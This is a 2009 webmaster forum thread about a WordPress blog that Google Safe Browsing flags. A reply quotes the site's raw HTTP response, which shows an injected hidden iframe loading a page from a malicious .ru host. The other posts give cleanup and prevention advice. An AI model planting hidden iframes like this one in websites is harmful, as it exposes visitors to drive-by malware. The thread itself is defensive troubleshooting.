1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Why my site is listed as suspicious in Google SafeBrowsing?

Discussion in 'Google' started by poshswinger, Sep 28, 2009.

0
  1. #1
    poshswinger, Sep 28, 2009 IP
  2. newlogo

    newlogo Peon

    Messages:
    3,932
    Likes Received:
    11
    Best Answers:
    0
    Trophy Points:
    0
    #2
    check in source code, if there is java script which automatic generated, clear code in site and ftp and upload again and send reinclusion request in google.
     
    newlogo, Sep 28, 2009 IP
  3. tattoos

    tattoos Prominent Member

    Messages:
    1,903
    Likes Received:
    150
    Best Answers:
    0
    Trophy Points:
    335
    #3
    "Malicious software is hosted on 1 domain(s), including agend[dot]ru"

    Do you know why agend,ru is mentioned in the report?

    Oh, I see...
    Looks like you may have been hacked... Unless that's your iframe!

    
http://www.rexswain.com/httpview.html

• Finding host IP address...
• Host IP address = 218.213.228.76
• Finding TCP protocol...
• Binding to local socket...
• Connecting to host...
• Sending request...
• Waiting for response...
Receiving Header:
HTTP/1.1·301·Moved·Permanently
Date:·Tue,·29·Sep·2009·06:18:58·GMT
Server:·Apache/2
X-Powered-By:·PHP/5.2.6
X-Pingback:·[url]http://apmevegas[/url][dot]com/xmlrpc[dot]php
Location:·[url]http://www.apmevegas[/url][dot]com/
Cache-Control:·max-age=0
Expires:·Tue,·29·Sep·2009·06:18:58·GMT
Vary:·Accept-Encoding,User-Agent
Content-Length:·410
Connection:·close
Content-Type:·text/html;·charset=UTF-8

End of Header (Length = 376)
• Elapsed time so far: 8 seconds
• Waiting for additional response until connection closes...
Total bytes received = 786
Elapsed time so far: 8 seconds
Content (Length = 410):

<div·style="display:none"></div>
<div·style="display:none"></div>
<div·style="display:none"></div>
<div·style="display:none"></div>
<div·style="display:none"></div>
<div·style="display:none"></div>
<div·style="display:none"></div>
<div·style="display:none"></div>
<div·style="display:none"></div>
<div·style="display:none"><iframe·width=277·height=497·src="http://on-liffe[dot]ru:8080/index.php"·></iframe></div>
Done
    Code (markup):
    Cheers
    James
     
    tattoos, Sep 28, 2009 IP
  4. newwebseo

    newwebseo Member

    Messages:
    270
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    28
    #4
    Yes it gives this warning when there is some kind of virus on your site, after you clean it up, submit review request through Google Webmaster Tools for removal of that warning in Google Search Results.
     
    newwebseo, Sep 28, 2009 IP
  5. poshswinger

    poshswinger Active Member

    Messages:
    2,527
    Likes Received:
    56
    Best Answers:
    0
    Trophy Points:
    90
    #5
    Do you have any idea why this iFrame appears in my blog source code? How can I get hacked? Is it due to Wordpress problem?

    How do I remove that? Should I simply remove the iFrame code?

    How can I prevent this thing from happening?

    Thank you. :)

     
    poshswinger, Sep 28, 2009 IP
  6. facerec

    facerec Peon

    Messages:
    274
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #6
    Hey..
    can someone tell me.. How can I check this for my site??
    thanx
     
    facerec, Sep 29, 2009 IP
  7. tattoos

    tattoos Prominent Member

    Messages:
    1,903
    Likes Received:
    150
    Best Answers:
    0
    Trophy Points:
    335
    #7
    I don't think removing the iframe will be enough, you will need to find out how they were able to get in and fix it so it doesn't happen again.
    There may be a vulnerability in wordpress itself, or one of the plugins you have installed on you blog. Check to make sure you have all the latest updates. It would probably be best to ask in the wordpress section. (I have no idea about it/never used it)

    Safe Browsing diagnostic tool

    Hope that helps.

    Cheers
    James
     
    tattoos, Sep 29, 2009 IP
  8. bryanon

    bryanon Well-Known Member

    Messages:
    806
    Likes Received:
    29
    Best Answers:
    0
    Trophy Points:
    145
    #8
    +1 to everything that James said but do change all your passwords related to this blog/server before (and perhaps after as well - in case everything you do is currently monitored by the hacker) doing all that.
     
    bryanon, Sep 29, 2009 IP
  9. poshswinger

    poshswinger Active Member

    Messages:
    2,527
    Likes Received:
    56
    Best Answers:
    0
    Trophy Points:
    90
    #9
    Nearly all of the blogs hosted in that web hosting are having the same problem with that iFrame added, but where (while file) can I find this iFrame code and delete such malicious code?
     
    poshswinger, Sep 29, 2009 IP
  10. tattoos

    tattoos Prominent Member

    Messages:
    1,903
    Likes Received:
    150
    Best Answers:
    0
    Trophy Points:
    335
    #10
    I would highly suggest you go have a look around over here.
    If you can't find the answer using the search, then ask.

    Hope that helps.

    Cheers
    James
     
    tattoos, Sep 29, 2009 IP
  11. poshswinger

    poshswinger Active Member

    Messages:
    2,527
    Likes Received:
    56
    Best Answers:
    0
    Trophy Points:
    90
    #11
    But any more advices on how can I prevent this from happening?

    Also, how can I let my site to get indexed again in Google?
     
    poshswinger, Sep 30, 2009 IP